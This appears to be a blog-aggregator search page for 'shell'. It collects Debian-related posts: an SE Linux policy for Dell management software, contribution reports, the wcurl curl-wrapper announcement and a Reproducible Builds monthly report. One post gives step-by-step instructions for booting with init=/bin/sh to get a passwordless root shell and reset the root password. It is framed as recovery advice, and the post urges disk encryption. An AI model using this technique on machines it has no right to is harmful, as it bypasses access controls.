Search Results: "shell"

21 July 2024

Russell Coker: SE Linux Policy for Dell Management

The recent issue of Windows security software killing computers has reminded me about the issue of management software for Dell systems. I wrote policy for the Dell management programs that extract information from iDRAC and store it in Linux. After the break I ve pasted in the policy. It probably needs some changes for recent software, it was last tested on a PowerEdge T320 and prior to that was used on a PowerEdge R710 both of which are old hardware and use different management software to the recent hardware. One would hope that the recent software would be much better but usually such hope is in vain. I deliberately haven t submitted this for inclusion in the reference policy because it s for proprietary software and also it permits many operations that we would prefer not to permit. The policy is after the break because it s larger than you want on a Planet feed. But first I ll give a few selected lines that are bad in a noteworthy way:
  1. sys_admin means the ability to break everything
  2. dac_override means break Unix permissions
  3. mknod means a daemon creates devices due to a lack of udev configuration
  4. sys_rawio means someone didn t feel like writing a device driver, maintaining a device driver for DKMS is hard and getting a driver accepted upstream requires writing quality code, in any case this is a bad sign.
  5. self:lockdown is being phased out, but used to mean bypassing some integrity protections, that would usually be related to sys_rawio or similar.
  6. dev_rx_raw_memory is bad, reading raw memory allows access to pretty much everything and execute of raw memory is something I can t imagine a good use for, the Reference Policy doesn t use this anywhere!
  7. dev_rw_generic_chr_files usually means a lack of udev configuration as udev should do that.
  8. storage_raw_write_fixed_disk shouldn t be needed for this sort of thing, it doesn t do anything that involves managing partitions.
Now without network access or other obvious ways of remote control this level of access while excessive isn t necessarily going to allow bad things to happen due to outside attack. But if there are bugs in the software there s nothing to stop it from giving the worst results.
allow dell_datamgrd_t self:capability   dac_override dac_read_search mknod sys_rawio sys_admin  ;
allow dell_datamgrd_t self:lockdown integrity;
dev_rx_raw_memory(dell_datamgrd_t)
dev_rw_generic_chr_files(dell_datamgrd_t)
dev_rw_ipmi_dev(dell_datamgrd_t)
dev_rw_sysfs(dell_datamgrd_t)
storage_raw_read_fixed_disk(dell_datamgrd_t)
storage_raw_write_fixed_disk(dell_datamgrd_t)
allow dellsrvadmin_t self:lockdown integrity;
allow dellsrvadmin_t self:capability   sys_admin sys_rawio  ;
dev_read_raw_memory(dellsrvadmin_t)
dev_rw_sysfs(dellsrvadmin_t)
dev_rx_raw_memory(dellsrvadmin_t)
The best thing that Dell could do for their customers is to make this free software and allow the community to fix some of these issues.
Here is dellsrvadmin.te:
policy_module(dellsrvadmin,1.0.0)
require  
  type dmidecode_exec_t;
  type udev_t;
  type device_t;
  type event_device_t;
  type mon_local_test_t;
 
type dellsrvadmin_t;
type dellsrvadmin_exec_t;
init_daemon_domain(dellsrvadmin_t, dellsrvadmin_exec_t)
type dell_datamgrd_t;
type dell_datamgrd_exec_t;
init_daemon_domain(dell_datamgrd_t, dell_datamgrd_t)
type dellsrvadmin_var_t;
files_type(dellsrvadmin_var_t)
domain_transition_pattern(udev_t, dellsrvadmin_exec_t, dellsrvadmin_t)
modutils_domtrans(dellsrvadmin_t)
allow dell_datamgrd_t device_t:dir rw_dir_perms;
allow dell_datamgrd_t device_t:chr_file create;
allow dell_datamgrd_t event_device_t:chr_file   read write  ;
allow dell_datamgrd_t self:process signal;
allow dell_datamgrd_t self:fifo_file rw_file_perms;
allow dell_datamgrd_t self:sem create_sem_perms;
allow dell_datamgrd_t self:capability   dac_override dac_read_search mknod sys_rawio sys_admin  ;
allow dell_datamgrd_t self:lockdown integrity;
allow dell_datamgrd_t self:unix_dgram_socket create_socket_perms;
allow dell_datamgrd_t self:netlink_route_socket r_netlink_socket_perms;
modutils_domtrans(dell_datamgrd_t)
can_exec(dell_datamgrd_t, dmidecode_exec_t)
allow dell_datamgrd_t dellsrvadmin_var_t:dir rw_dir_perms;
allow dell_datamgrd_t dellsrvadmin_var_t:file manage_file_perms;
allow dell_datamgrd_t dellsrvadmin_var_t:lnk_file read;
allow dell_datamgrd_t dellsrvadmin_var_t:sock_file manage_file_perms;
kernel_read_network_state(dell_datamgrd_t)
kernel_read_system_state(dell_datamgrd_t)
kernel_search_fs_sysctls(dell_datamgrd_t)
kernel_read_vm_overcommit_sysctl(dell_datamgrd_t)
# for /proc/bus/pci/*
kernel_write_proc_files(dell_datamgrd_t)
corecmd_exec_bin(dell_datamgrd_t)
corecmd_exec_shell(dell_datamgrd_t)
corecmd_shell_entry_type(dell_datamgrd_t)
dev_rx_raw_memory(dell_datamgrd_t)
dev_rw_generic_chr_files(dell_datamgrd_t)
dev_rw_ipmi_dev(dell_datamgrd_t)
dev_rw_sysfs(dell_datamgrd_t)
files_search_tmp(dell_datamgrd_t)
files_read_etc_files(dell_datamgrd_t)
files_read_etc_symlinks(dell_datamgrd_t)
files_read_usr_files(dell_datamgrd_t)
logging_search_logs(dell_datamgrd_t)
miscfiles_read_localization(dell_datamgrd_t)
storage_raw_read_fixed_disk(dell_datamgrd_t)
storage_raw_write_fixed_disk(dell_datamgrd_t)
can_exec(mon_local_test_t, dellsrvadmin_exec_t)
allow mon_local_test_t dellsrvadmin_var_t:dir search;
allow mon_local_test_t dellsrvadmin_var_t:file read_file_perms;
allow mon_local_test_t dellsrvadmin_var_t:file setattr;
allow mon_local_test_t dellsrvadmin_var_t:sock_file write;
allow mon_local_test_t dell_datamgrd_t:unix_stream_socket connectto;
allow mon_local_test_t self:sem   create read write destroy unix_write  ;
allow dellsrvadmin_t self:process signal;
allow dellsrvadmin_t self:lockdown integrity;
allow dellsrvadmin_t self:sem create_sem_perms;
allow dellsrvadmin_t self:fifo_file rw_file_perms;
allow dellsrvadmin_t self:packet_socket create;
allow dellsrvadmin_t self:unix_stream_socket   connectto create_stream_socket_perms  ;
allow dellsrvadmin_t self:capability   sys_admin sys_rawio  ;
dev_read_raw_memory(dellsrvadmin_t)
dev_rw_sysfs(dellsrvadmin_t)
dev_rx_raw_memory(dellsrvadmin_t)
allow dellsrvadmin_t dellsrvadmin_var_t:dir rw_dir_perms;
allow dellsrvadmin_t dellsrvadmin_var_t:file manage_file_perms;
allow dellsrvadmin_t dellsrvadmin_var_t:lnk_file read;
allow dellsrvadmin_t dellsrvadmin_var_t:sock_file write;
allow dellsrvadmin_t dell_datamgrd_t:unix_stream_socket connectto;
kernel_read_network_state(dellsrvadmin_t)
kernel_read_system_state(dellsrvadmin_t)
kernel_search_fs_sysctls(dellsrvadmin_t)
kernel_read_vm_overcommit_sysctl(dellsrvadmin_t)
corecmd_exec_bin(dellsrvadmin_t)
corecmd_exec_shell(dellsrvadmin_t)
corecmd_shell_entry_type(dellsrvadmin_t)
files_read_etc_files(dellsrvadmin_t)
files_read_etc_symlinks(dellsrvadmin_t)
files_read_usr_files(dellsrvadmin_t)
logging_search_logs(dellsrvadmin_t)
miscfiles_read_localization(dellsrvadmin_t)
Here is dellsrvadmin.fc:
/opt/dell/srvadmin/sbin/.*        --        gen_context(system_u:object_r:dellsrvadmin_exec_t,s0)
/opt/dell/srvadmin/sbin/dsm_sa_datamgrd        --        gen_context(system_u:object_r:dell_datamgrd_t,s0)
/opt/dell/srvadmin/bin/.*        --        gen_context(system_u:object_r:dellsrvadmin_exec_t,s0)
/opt/dell/srvadmin/var(/.*)?                        gen_context(system_u:object_r:dellsrvadmin_var_t,s0)
/opt/dell/srvadmin/etc/srvadmin-isvc/ini(/.*)?        gen_context(system_u:object_r:dellsrvadmin_var_t,s0)

10 July 2024

Freexian Collaborators: Debian Contributions: YubiHSM packaging, unschroot, live-patching, and more! (by Stefano Rivera)

Debian Contributions: 2024-06 Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

YubiHSM packaging, by Colin Watson Freexian is starting to use YubiHSM devices (hardware security modules) as part of some projects, and we wanted to have the supporting software directly in Debian rather than needing to use third-party repositories. Since Yubico publish everything we need under free software licences, Colin packaged yubihsm-connector, yubihsm-shell, and python-yubihsm from https://developers.yubico.com/, in some cases based partly on the upstream packaging, and got them all into Debian unstable. Backports to bookworm will be forthcoming once they ve all reached testing.

unschroot by Helmut Grohne Following an in-person discussion at MiniDebConf Berlin, Helmut attempted splitting the containment functionality of sbuild --chroot-mode=unshare into a dedicated tool interfacing with sbuild as a variant of --chroot-mode=schroot providing a sufficiently compatible interface. While this seemed technically promising initially, a discussion on debian-devel indicated a desire to rely on an existing container runtime such as podman instead of using another Debian-specific tool with unclear long term maintenance. None of the existing container runtimes meet the specific needs of sbuild, so further advancing this matter implies a compromise one way or another.

Linux live-patching, by Santiago Ruano Rinc n In collaboration with Emmanuel Arias, Santiago is working on the development of linux live-patching for Debian. For the moment, this is in an exploratory phase, that includes how to handle the different patches that will need to be provided. kpatch could help significantly in this regard. However, kpatch was removed from unstable because there are some RC bugs affecting the version that was present in Debian unstable. Santiago packaged the most recent upstream version (0.9.9) and filed an Intent to Salvage bug. Santiago is waiting for an ACK by the maintainer, and will upload to unstable after July 10th, following the package salvaging rules. While kpatch 0.9.9 fixes the main issues, it still needs some work to properly support Debian and the Linux kernel versions packaged in our distribution. More on this in the report next month.

Salsa CI, by Santiago Ruano Rinc n The work by Santiago in Salsa CI this month includes a merge request to ease testing how the production images are built from the changes introduced by future merge requests. By default, the pipelines triggered by a merge request build a subset of the images built for production, to reduce the use of resources, and because most of the time the subset of staging images is enough to test the proposed modifications. However, sometimes it is needed to test how the full set of production images is built, and the above mentioned MR helps to do that. The changes include documentation, so hopefully this will make it easier to test future contributions. Also, for being able to include support for RISC-V, Salsa CI needs to replace kaniko as the tool used to build the images. Santiago tested buildah, but there are some issues when pushing built images for non-default platform architectures (i386, armhf, armel) to the container registry. Santiago will continue to work on this to find a solution.

Miscellaneous contributions
  • Stefano Rivera prepared updates for a number of Python modules.
  • Stefano uploaded the latest point release of Python 3.12 and the latest Python 3.13 beta. Both uncovered upstream regressions that had to be addressed.
  • Stefano worked on preparations for DebConf 24.
  • Stefano helped SPI to reconcile their financial records for DebConf 23.
  • Colin did his usual routine work on the Python team, upgrading 36 packages to new upstream versions (including fixes for four CVEs in python-aiohttp), fixing RC bugs in ipykernel, ipywidgets, khard, and python-repoze.sphinx.autointerface, and packaging zope.deferredimport which was needed for a new upstream version of python-persistent.
  • Colin removed the user_readenv option from OpenSSH s PAM configuration (#1018260), and prepared a release note.
  • Thorsten Alteholz uploaded a new upstream version of cups.
  • Nicholas Skaggs updated xmacro to support reproducible builds (#1014428), DEP-3 and DEP-5 compatibility, along with utilizing hardening build flags. Helmut supported and uploaded package.
  • As a result of login having become non-essential, Helmut uploaded debvm to unstable and stable and fixed a crossqa.debian.net worker.
  • Santiago worked on the Content Team activities for DebConf24. Together with other DebConf25 team members, Santiago wrote a document for the head of the venue to describe the project of the conference.

3 July 2024

Samuel Henrique: Announcing wcurl: a curl wrapper to download files

tl;dr Whenever you need to download files through the terminal and don't feel like using wget:
wcurl example.com/filename.txt
Manpage:
https://manpages.debian.org/unstable/curl/wcurl.1.en.html

Availability (comes installed with the curl package):
  • Debian unstable - Since 2024-07-02
  • Debian testing - Since 2024-07-18
  • Debian 12/bookworm backports - Expected by the end of August 2024.
  • Debian 12/bookworm - Depends on whether Debian's release team will approve it, it could be available in the next point release.
  • Debian derivatives - Rolling releases will get it by the time it's on Debian testing (e.g.: Kali Linux). Stable derivatives only in their next major release.
If you don't want to wait for the package update to arrive, you can always copy the script and place it in your /usr/bin, the code is here:
https://github.com/Debian/wcurl/blob/main/wcurl
https://salsa.debian.org/debian/wcurl/-/blob/main/wcurl?ref_type=heads

Smoother CLI experience Starting with curl version 8.8.0-2, the Debian's curl package now ships a wcurl executable. wcurl is the solution for those who just need to download files without having to remember curl's parameters for things like automatically naming the files. Some people, myself included, would fall back to using wget whenever there was a need to download a file. Sometimes even installing wget just for that usecase. After all, it's easier to remember "apt install wget" rather than "curl -L -O -C - ...". wcurl consists of a simple shell script that provides sane defaults for the curl invocation, for when the use case is to just download files. By default, wcurl will:
  • Encode whitespaces in URLs;
  • Download multiple URLs in parallel if the installed curl's version is >= 7.66.0;
  • Follow redirects;
  • Automatically choose a filename as output;
  • Avoid overwriting files if the installed curl's version is >= 7.83.0 (--no-clobber);
  • Perform retries;
  • Set the downloaded file timestamp to the value provided by the server, if available;
  • Default to the protocol used as https if the URL doesn't contain any;
  • Disable curl's URL globbing parser so and [] characters in URLs are not treated specially.
Example to download a single file:
wcurl example.com/filename.txt
If you ever need to set a custom flag, you can make use of the --curl-options wcurl option, anything set there will be passed to the curl invocation. Just beware that if you need to set any custom flags, it's likely you will be better served by calling curl directly. The --curl-options option is there to allow for some flexibility in unforeseen circumstances.

The need for wcurl I've always felt a bit ashamed of not remembering curl's parameters for downloading a file and automatically naming it, having resorted to wget most of the times this was needed (even installing wget when it wasn't there, just for this). I've spoken to a few other experienced people I know and confirmed what could be obvious to others: a lot of people struggle with this. Recently, the curl project released the results of 2024's curl survey, which also showed this is as a much needed feature, just look at some of the answers:

Q: Which curl command line option do you think needs improvement and how?
-O, I really want wget like functionality where I don't have to specify the name
Downloading a file (like wget) could be improved - with automatic naming of the file
downloading files - wget is much cleaner
I wish the default behaviour when GETting a binary was to drop it on disk. That's the only reason 'wget foo.tgz" is still ingrained in my muscle memory .
Maybe have a way to download without specifying something in -o (the only reason i used wget still)
--remote-time should be default
--remote-name-all could really use a short flag

Q: If you miss support for something, tell us what!
"Write the data to the file named in the URL (or in redirects if I'm feeling daring), and timestamp the file to the last-modified-date". This is the main reason I'm still using wget.
I can finally feel less bad about falling back to wget due to not remembering the parameters I want.

Idealization vs. reality I don't believe curl will ever change its default behavior in such a way that would accommodate this need, as that would have a side-effect of breaking things which expect the current behavior (the blast radius is literally the solar system). This means a new executable needs to be shipped side-by-side with curl, an opportunity to start fresh and work with a more focused use case (to download files). Ideally, this new executable would be maintained by the curl project, make use of libcurl under-the-hood, and be available everywhere. Nobody wants to worry if their systems have the tool or not, it should always be there. Given I'm just a Debian Developer, with not as much free time as I wish, I've decided to write a simple shell script wrapper calling the curl CLI under-the-hood. wcurl will come installed with the curl package from now on, and I will check with the release team about shipping it on the current Debian stable as well. Shipping wcurl in other distros will be up to them (Debian-derivatives should pick it up automatically, though). We've tried to make it easy for anyone to ship this by using the curl license, keeping the script POSIX-compliant, and shipping a manpage. Maybe if there's enough interest across distributions, someone might sign up for implementing this in upstream curl and increase its reach. I would be happy with the curl project reusing the wcurl name when that happens. It's unlikely that wcurl would be shipped by curl upstream as it is, assuming they would prefer a solution that uses libcurl direclty (more similar to curl the CLI, to maintain). In the worst case, wcurl becomes a Debian-specific tool that only a few people are aware of, in the best case, it becomes the new go-to CLI tool for simply downloading files. I would be happy if at least someone other than me finds it useful.

Naming is hard When I started working on it, I was calling the new executable "curld" (stands for "curl download"), but then when discussing this in one of our weekly calls in the Debian Bras lia community, it was mentioned that this could be confused for a daemon. We then settled for the name "wcurl", suggested by Carlos Henrique Lima Melara <charles>. It doesn't really stand for anything, but it's very easy to remember. You know... "it's that wget alternative for when you want to use curl instead" :)

Feedback I'm hosting the code on Github and Debian's GitLab instance, feel free to open an issue to provide feedback.
https://salsa.debian.org/debian/wcurl
https://github.com/Debian/wcurl We also have a Matrix room for the Debian curl maintainers:
https://matrix.to/#/#debian-curl-maintainers:matrix.org

Acknowledgments The idea for wcurl came a few days before the curl-up conference 2024. I've been thinking a lot about developer productivity in the terminal lately, different tools and better defaults. Before curl-up, I was also thinking about packaging improvements for the curl package. I don't remember what exactly happened, but I likely had to download something and felt a bit ashamed of maintaining curl and not remembering the parameters to download files the way I wanted. I first discussed this idea in the conference, where I asked the participants about it and there were no concerns raised, and some people said I should give it a go. Participating in curl-up was a really great experience and I'm thankful for the interactions I've had there. On the Debian side, I've got reviews of the code and manpage by Sergio Durigan Junior <sergiodj>, Guilherme Puida Moreira <puida> and Carlos Henrique Lima Melara <charles>. Sergio ended up rewriting the tool to be POSIX-compliant (my version was written in bash), so he takes all the credit for the portability.

Changes since publication

2024-07-18
  • Update date of availability for Debian testing and expected date for bookworm backports.
  • Mention charles as the person who suggested "wcurl" as a name.
  • Update wcurl's -o/--opts options, it's now just --curl-options.
  • Remove mention of language spoken in the Matrix room, we are using English now.
  • Update list of features of wcurl.

2 July 2024

Colin Watson: Free software activity in June 2024

My Debian contributions this month were all sponsored by Freexian. You can support my work directly via Liberapay.

6 June 2024

Paul Wise: FLOSS Activities May 2024

Focus This month I didn't have any particular focus. I just worked on issues in my info bubble.

Changes

Issues

Review
  • Debian BTS usertags: changes for the month

Administration
  • Debian wiki: approve accounts

Communication
  • Respond to queries from Debian users and contributors on the mailing lists and IRC

Sponsors All work was done on a volunteer basis.

2 June 2024

Jacob Adams: What to Do When You Forget Your Root Password

Forgetting your root password would initially seem like a problem requiring a full re-install, one that you can t easily recover from without wiping everything away. Forgetting your user password can of course be solved by changing it as root, as in the following, which changes the password for user jacob:
# passwd jacob
but only the root user can change their own password, so you need to somehow get root access in order to do so.

Changing Root s Password with Sudo This one is probably obvious, but if you have a user with the ability to use sudo, then you can change root s password without access to the root account by running:
$ sudo passwd
which will reset the password for the root account without requiring the existing password.

Boot Directly to a Shell Getting root access to any Linux machine you have physical access to is surprisingly simple. You can just boot the machine directly into a root shell without any access control, i.e. passwords.

Why You Should Always Encrypt Your Storage1 To boot directly to a shell you need to append the following text to the kernel command line:
init=/bin/sh
(You could use pretty much any program here, but you re putting your system into a weird state doing this, and so I d recommend the simplest approach.)

GRUB GRUB will allow you to edit boot parameters on startup using the e key. You ll then be presented with a editor2 that you can use to change the kernel command line by appending to the linux line. E.g. If your editor looks like this:
        load_video
        insmod gzio
        if [ x$grub_platform = xxen ]; then insmod xzio; insmod lzopio; fi
        insmod part_gpt
        insmod ext2
        search --no-floppy --fs-uuid --set=root abcd1234-5678-0910-1112-abcd12345678
        echo    'Loading Linux 6.1.0-21-amd64 ...'
        linux   /boot/vmlinuz-6.1.0-21-amd64 root=UUID=abcd1234-5678-0910-1112-abcd12345678 ro  quiet
        echo    'Loading initial ramdisk ...'
        initrd  /boot/initrd.img-6.1.0-21-amd64
Then you would add init=/bin/sh like so:
        load_video
        insmod gzio
        if [ x$grub_platform = xxen ]; then insmod xzio; insmod lzopio; fi
        insmod part_gpt
        insmod ext2
        search --no-floppy --fs-uuid --set=root abcd1234-5678-0910-1112-abcd12345678
        echo    'Loading Linux 6.1.0-21-amd64 ...'
        linux   /boot/vmlinuz-6.1.0-21-amd64 root=UUID=abcd1234-5678-0910-1112-abcd12345678 ro  quiet init=/bin/sh
        echo    'Loading initial ramdisk ...'
        initrd  /boot/initrd.img-6.1.0-21-amd64
Once you ve edited it you can start your machine with Ctrl+x, as you can see from the prompt text under the editor.

Raspberry Pi cmdline.txt On a Raspberry Pi you ll want to append the above to only line of the cmdline.txt file on the boot partition of the SD card. This is the first partition of the disk, the one that is FAT32. You ll need to do this on another machine, since if you had root access to edit cmdline.txt you could also just change your password. As it is a FAT32 partition on an SD card, it should be editable on any other machine that supports SD cards. E.g. If your cmdline.txt looks like this
console=serial0,115200 console=tty1 root=PARTUUID=fb33757d-02 rootfstype=ext4 fsck.repair=yes rootwait quiet
Then you would add init=/bin/sh like so:
console=serial0,115200 console=tty1 root=PARTUUID=fb33757d-02 rootfstype=ext4 fsck.repair=yes rootwait quiet init=/bin/sh

Mount Read / Write Since you re replacing the init process of the machine with a shell, no other processes will be running. Also, your root filesystem will be mounted read-only, as init is expected to remount it read-write as needed.
# mount -o remount,rw /

Change Root Password Once you ve remounted the root filesystem, all that s needed is to run the passwd command.
# passwd
Since you re running the command as root you won t need to provide your existing password, and will only need to type a new password twice. Now of course you simply need to remember that password in order to ensure you don t need to do this again.

Reboot Safely You now cannot follow the standard reboot process here, as you re only running one process. Therefore it s important to put your root filesystem back into read-only before powering off your machine:
# mount -o remount,ro /
Once you ve done that you just need to hold down the power button until the machine completely powers off or pull the plug. And then you re done! Boot the computer again and you ll have everything working as normal, with a root password you remember.
  1. Not that this is the only reason, anyone with physical access to your machine could also boot it into another operating system they control, or just remove your storage device and put it into another computer, or probably other things I m not thinking of now. You should always encrypt your devices.
  2. The editor uses emacs-like keybindings. The manual includes a list of all the options available.

10 May 2024

Reproducible Builds: Reproducible Builds in April 2024

Welcome to the April 2024 report from the Reproducible Builds project! In our reports, we attempt to outline what we have been up to over the past month, as well as mentioning some of the important things happening more generally in software supply-chain security. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website. Table of contents:
  1. New backseat-signed tool to validate distributions source inputs
  2. NixOS is not reproducible
  3. Certificate vulnerabilities in F-Droid s fdroidserver
  4. Website updates
  5. Reproducible Builds and Insights from an Independent Verifier for Arch Linux
  6. libntlm now releasing minimal source-only tarballs
  7. Distribution work
  8. Mailing list news
  9. diffoscope
  10. Upstream patches
  11. reprotest
  12. Reproducibility testing framework

New backseat-signed tool to validate distributions source inputs kpcyrd announced a new tool called backseat-signed, after:
I figured out a somewhat straight-forward way to check if a given git archive output is cryptographically claimed to be the source input of a given binary package in either Arch Linux or Debian (or both).
Elaborating more in their announcement post, kpcyrd writes:
I believe this to be the reproducible source tarball thing some people have been asking about. As explained in the README, I believe reproducing autotools-generated tarballs isn t worth everybody s time and instead a distribution that claims to build from source should operate on VCS snapshots instead of tarballs with 25k lines of pre-generated shell-script.
Indeed, many distributions packages already build from VCS snapshots, and this trend is likely to accelerate in response to the xz incident. The announcement led to a lengthy discussion on our mailing list, as well as shorter followup thread from kpcyrd about bootstrapping Autotools projects.

NixOS is not reproducible Morten Linderud posted an post on his blog this month, provocatively titled, NixOS is not reproducible . Although quickly admitting that his title is indeed clickbait , Morten goes on to clarify the precise guarantees and promises that NixOS provides its users. Later in the most, Morten mentions that he was motivated to write the post because:
I have heavily invested my free-time on this topic since 2017, and met some of the accomplishments we have had with Doesn t NixOS solve this? for just as long and I thought it would be of peoples interest to clarify[.]

Certificate vulnerabilities in F-Droid s fdroidserver In early April, Fay Stegerman announced a certificate pinning bypass vulnerability and Proof of Concept (PoC) in the F-Droid fdroidserver tools for managing builds, indexes, updates, and deployments for F-Droid repositories to the oss-security mailing list.
We observed that embedding a v1 (JAR) signature file in an APK with minSdk >= 24 will be ignored by Android/apksigner, which only checks v2/v3 in that case. However, since fdroidserver checks v1 first, regardless of minSdk, and does not verify the signature, it will accept a fake certificate and see an incorrect certificate fingerprint. [ ] We also realised that the above mentioned discrepancy between apksigner and androguard (which fdroidserver uses to extract the v2/v3 certificates) can be abused here as well. [ ]
Later on in the month, Fay followed up with a second post detailing a third vulnerability and a script that could be used to scan for potentially affected .apk files and mentioned that, whilst upstream had acknowledged the vulnerability, they had not yet applied any ameliorating fixes.

Website updates There were a number of improvements made to our website this month, including Chris Lamb updating the archive page to recommend -X and unzipping with TZ=UTC [ ] and adding Maven, Gradle, JDK and Groovy examples to the SOURCE_DATE_EPOCH page [ ]. In addition Jan Zerebecki added a new /contribute/opensuse/ page [ ] and Sertonix fixed the automatic RSS feed detection [ ][ ].

Reproducible Builds and Insights from an Independent Verifier for Arch Linux Joshua Drexel, Esther H nggi and Iy n M ndez Veiga of the School of Computer Science and Information Technology, Hochschule Luzern (HSLU) in Switzerland published a paper this month entitled Reproducible Builds and Insights from an Independent Verifier for Arch Linux. The paper establishes the context as follows:
Supply chain attacks have emerged as a prominent cybersecurity threat in recent years. Reproducible and bootstrappable builds have the potential to reduce such attacks significantly. In combination with independent, exhaustive and periodic source code audits, these measures can effectively eradicate compromises in the building process. In this paper we introduce both concepts, we analyze the achievements over the last ten years and explain the remaining challenges.
What is more, the paper aims to:
contribute to the reproducible builds effort by setting up a rebuilder and verifier instance to test the reproducibility of Arch Linux packages. Using the results from this instance, we uncover an unnoticed and security-relevant packaging issue affecting 16 packages related to Certbot [ ].
A PDF of the paper is available.

libntlm now releasing minimal source-only tarballs Simon Josefsson wrote on his blog this month that, going forward, the libntlm project will now be releasing what they call minimal source-only tarballs :
The XZUtils incident illustrate that tarballs with files that are not included in the git archive offer an opportunity to disguise malicious backdoors. [The] risk of hiding malware is not the only motivation to publish signed minimal source-only tarballs. With pre-generated content in tarballs, there is a risk that GNU/Linux distributions [ship] generated files coming from the tarball into the binary *.deb or *.rpm package file. Typically the person packaging the upstream project never realized that some installed artifacts was not re-built[.]
Simon s post goes into further details how this was achieved, and describes some potential caveats and counters some expected responses as well. A shorter version can be found in the announcement for the 1.8 release of libntlm.

Distribution work In Debian this month, Helmut Grohne filed a bug suggesting the removal of dh-buildinfo, a tool to generate and distribute .buildinfo-like files within binary packages. Note that this is distinct from the .buildinfo generation performed by dpkg-genbuildinfo. By contrast, the entirely optional dh-buildinfo generated a debian/buildinfo file that would be shipped within binary packages as /usr/share/doc/package/buildinfo_$arch.gz. Adrian Bunk recently asked about including source hashes in Debian s .buildinfo files, which prompted Guillem Jover to refresh some old patches to dpkg to make this possible, which revealed some quirks Vagrant Cascadian discovered when testing. In addition, 21 reviews of Debian packages were added, 22 were updated and 16 were removed this month adding to our knowledge about identified issues. A number issue types have been added, such as new random_temporary_filenames_embedded_by_mesonpy and timestamps_added_by_librime toolchain issues. In openSUSE, it was announced that their Factory distribution enabled bit-by-bit reproducible builds for almost all parts of the package. Previously, more parts needed to be ignored when comparing package files, but now only the signature needs to be deleted. In addition, Bernhard M. Wiedemann published theunreproduciblepackage as a proper .rpm package which it allows to better test tools intended to debug reproducibility. Furthermore, it was announced that Bernhard s work on a 100% reproducible openSUSE-based distribution will be funded by NLnet. He also posted another monthly report for his reproducibility work in openSUSE. In GNU Guix, Janneke Nieuwenhuizen submitted a patch set for creating a reproducible source tarball for Guix. That is to say, ensuring that make dist is reproducible when run from Git. [ ] Lastly, in Fedora, a new wiki page was created to propose a change to the distribution. Titled Changes/ReproduciblePackageBuilds , the page summarises itself as a proposal whereby A post-build cleanup is integrated into the RPM build process so that common causes of build irreproducibility in packages are removed, making most of Fedora packages reproducible.

Mailing list news On our mailing list this month:
  • Continuing a thread started in March 2024 about the Arch Linux minimal container now being 100% reproducible, John Gilmore followed up with a post about the practical and philosophical distinctions of local vs. remote storage of the various artifacts needed to build packages.
  • Chris Lamb asked the list which conferences readers are attending these days: After peak Covid and other industry-wide changes, conferences are no longer the must attend events they previously were especially in the area of software supply-chain security. In rough, practical terms, it seems harder to justify conference travel today than it did in mid-2019. The thread generated a number of responses which would be of interest to anyone planning travel in Q3 and Q4 of 2024.
  • James Addison wrote to the list about a quirk in Git related to its core.autocrlf functionality, thus helpfully passing on a slightly off-topic and perhaps not of direct relevance to anyone on the list today note that might still be the kind of issue that is useful to be aware of if-and-when puzzling over unexpected git content / checksum issues (situations that I do expect people on this list encounter from time-to-time) .

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 263, 264 and 265 to Debian and made the following additional changes:
  • Don t crash on invalid .zip files, even if we encounter their badness halfway through the file and not at the time of their initial opening. [ ]
  • Prevent odt2txt tests from always being skipped due to an (impossibly) new version requirement. [ ]
  • Avoid parens-in-parens in test skipping messages. [ ]
  • Ensure that tests with >=-style version constraints actually print the tool name. [ ]
In addition, Fay Stegerman fixed a crash when there are (invalid) duplicate entries in .zip which was originally reported in Debian bug #1068705). [ ] Fay also added a user-visible note to a diff when there are duplicate entries in ZIP files [ ]. Lastly, Vagrant Cascadian added an external tool pointer for the zipdetails tool under GNU Guix [ ] and proposed updates to diffoscope in Guix as well [ ] which were merged as [264] [265], fixed a regression in test coverage and increased verbosity of the test suite[ ].

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

reprotest reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, reprotest version 0.7.27 was uploaded to Debian unstable) by Vagrant Cascadian who made the following additional changes:
  • Enable specific number of CPUs using --vary=num_cpus.cpus=X. [ ]
  • Consistently use 398 days for time variation, rather than choosing randomly each time. [ ]
  • Disable builds of arch:any packages. [ ]
  • Update the description for the build_path.path option in README.rst. [ ]
  • Update escape sequences for compatibility with Python 3.12. (#1068853). [ ]
  • Remove the generic upstream signing-key [ ] and update the packages signing key with the currently active team members [ ].
  • Update the packaging Standards-Version to 4.7.0. [ ]
In addition, Holger Levsen fixed some spelling errors detected by the spellintian tool [ ] and Vagrant Cascadian updated reprotest in GNU Guix to 0.7.27.

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In April, an enormous number of changes were made by Holger Levsen:
  • Debian-related changes:
    • Adjust for changed internal IP addresses at Codethink. [ ]
    • Automatically cleanup failed diffoscope user services if there are too many failures. [ ][ ]
    • Configure two new nodes at infomanik.cloud. [ ][ ]
    • Schedule Debian experimental even less. [ ][ ]
  • Breakage detection:
    • Exclude currently building packages from breakage detection. [ ]
    • Be more noisy if diffoscope crashes. [ ]
    • Health check: provide clickable URLs in jenkins job log for failed pkg builds due to diffoscope crashes. [ ]
    • Limit graph to about the last 100 days of breakages only. [ ]
    • Fix all found files with bad permissions. [ ]
    • Prepare dealing with diffoscope timeouts. [ ]
    • Detect more cases of failure to debootstrap base system. [ ]
    • Include timestamps of failed job runs. [ ]
  • Documentation updates:
    • Document how to access arm64 nodes at Codethink. [ ]
    • Document how to use infomaniak.cloud. [ ]
    • Drop notes about long stalled LeMaker HiKey960 boards sponsored by HPE and hosted at ETH. [ ]
    • Mention osuosl4 and osuosl5 and explain their usage. [ ]
    • Mention that some packages are built differently. [ ][ ]
    • Improve language in a comment. [ ]
    • Add more notes how to query resource usage from infomaniak.cloud. [ ]
  • Node maintenance:
    • Add ionos4 and ionos14 to THANKS. [ ][ ][ ][ ][ ]
    • Deprecate Squid on ionos1 and ionos10. [ ]
    • Drop obsolete script to powercycle arm64 architecture nodes. [ ]
    • Update system_health_check for new proxy nodes. [ ]
  • Misc changes:
    • Make the update_jdn.sh script more robust. [ ][ ]
